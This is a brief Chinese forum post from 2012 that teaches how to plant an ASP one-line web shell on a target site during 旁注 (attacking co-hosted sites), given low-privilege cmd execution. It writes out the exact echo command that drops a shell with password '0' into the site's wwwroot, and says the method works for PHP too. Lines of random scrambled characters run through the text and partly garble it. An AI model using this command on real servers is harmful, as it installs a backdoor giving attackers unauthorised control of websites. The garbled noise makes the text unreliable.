在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
0 u: Z, B# l+ A6 t& y0 s$ ~" `
5 w* T/ x6 s5 Q; \: a2 y3 _, X命令格式
& b* q& w- w6 X# d% c% x% S4 x
* R6 f* c0 [, J+ A) CEcho 语句 >目标站绝对目录. B! |4 s8 q5 D5 |
+ D" l5 U; {$ O例如: # P9 o/ @# Z5 V% r2 J# t1 Y
. z) ?, H9 ?' d# N/ Z6 O% w" Aecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
& p' Z' I0 M& r. r0 y' @' C6 R- K% t$ f
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
V; d6 H: i4 X3 \9 n& \& j3 c$ X |
发表于 2012-9-23 14:40:24
收藏
支持
反对